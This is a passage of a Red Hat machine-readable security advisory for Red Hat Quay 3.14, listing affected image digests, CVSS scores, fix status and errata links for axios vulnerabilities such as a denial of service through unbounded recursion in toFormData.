            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "axios: Axios: Arbitrary HTTP header injection via prototype pollution"
    },
    {
      "cve": "CVE-2026-42039",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-24T19:01:44.887156+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461630"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461630",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461630"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42039",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"
        }
      ],
      "release_date": "2026-04-24T18:01:30.775000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data"
    },
    {
      "cve": "CVE-2026-42041",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:41.034289+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
